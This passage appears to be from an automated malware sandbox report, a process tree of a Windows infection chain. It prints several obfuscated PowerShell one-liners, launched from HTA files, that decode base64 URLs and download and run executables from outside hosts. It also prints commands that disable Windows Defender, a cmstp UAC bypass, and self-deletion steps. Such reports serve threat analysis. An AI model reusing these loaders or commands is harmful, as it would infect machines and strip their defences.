- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3740 -
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3276 -
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:3036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 3036 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\801620313514328\\* & exit8⤵PID:4004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 30369⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
-
-
-
C:\Users\Public\jui.exe"C:\Users\Public\jui.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488 -
C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"8⤵
- Executes dropped EXE
PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"C:\Users\Admin\AppData\Local\Temp\y6eLz6oSft.exe"8⤵
- Executes dropped EXE
PID:4436
-
-
-
C:\Users\Admin\AppData\Local\Temp\cnThYCQFnu.exe"C:\Users\Admin\AppData\Local\Temp\cnThYCQFnu.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:4968 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵PID:6116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\AdShotso.bat" "9⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\AdShotso.bat" "9⤵PID:6012
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\kw3aCw7M67.exe"C:\Users\Admin\AppData\Local\Temp\kw3aCw7M67.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Users\Admin\AppData\Local\Temp\kw3aCw7M67.exe"C:\Users\Admin\AppData\Local\Temp\kw3aCw7M67.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4076 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fptkpzoo.inf9⤵PID:1564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YbZiyFsdYL.exe"C:\Users\Admin\AppData\Local\Temp\YbZiyFsdYL.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\YbZiyFsdYL.exe"C:\Users\Admin\AppData\Local\Temp\YbZiyFsdYL.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:5420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:5532
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\jui.exe"7⤵PID:3444
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:1076
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:3812
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Users\Public\odx.exe"C:\Users\Public\odx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5828 -
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5400 -
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4380 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\319487703982083\\* & exit9⤵PID:480
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 438010⤵
- Kills process with taskkill
PID:3532
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
PID:3500
-
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"{path}"7⤵
- Executes dropped EXE
PID:1804
-
-
-
C:\Users\Public\odx.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:5840 -
C:\Users\Admin\AppData\Local\Temp\WxzzZNQHI3.exe"C:\Users\Admin\AppData\Local\Temp\WxzzZNQHI3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\WxzzZNQHI3.exe"C:\Users\Admin\AppData\Local\Temp\WxzzZNQHI3.exe"8⤵
- Executes dropped EXE
PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\cLK6vDADey.exe"C:\Users\Admin\AppData\Local\Temp\cLK6vDADey.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2528 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:3560
-
-
-
C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"8⤵
- Executes dropped EXE
PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"C:\Users\Admin\AppData\Local\Temp\UrXJ4xouC3.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5232 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\a0p14iod.inf9⤵PID:5168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"8⤵
- Executes dropped EXE
PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"C:\Users\Admin\AppData\Local\Temp\ZSZAUJV5RA.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:5768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:5244
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\odx.exe"7⤵PID:908
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:3856
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:1180
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Users\Public\jev.exe"C:\Users\Public\jev.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4564
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7361.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:2916
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\f1xl0ksx.exe2⤵PID:4512
-
C:\Windows\temp\f1xl0ksx.exeC:\Windows\temp\f1xl0ksx.exe3⤵
- Executes dropped EXE
PID:428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵PID:4840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵PID:5272
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\mgovv5kp.exe2⤵PID:6104
-
C:\Windows\temp\mgovv5kp.exeC:\Windows\temp\mgovv5kp.exe3⤵
- Executes dropped EXE
PID:4524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:5160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵PID:184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵PID:6080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵PID:5356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵PID:5884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵PID:5444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵PID:3220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵PID:2356
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
PID:5008
-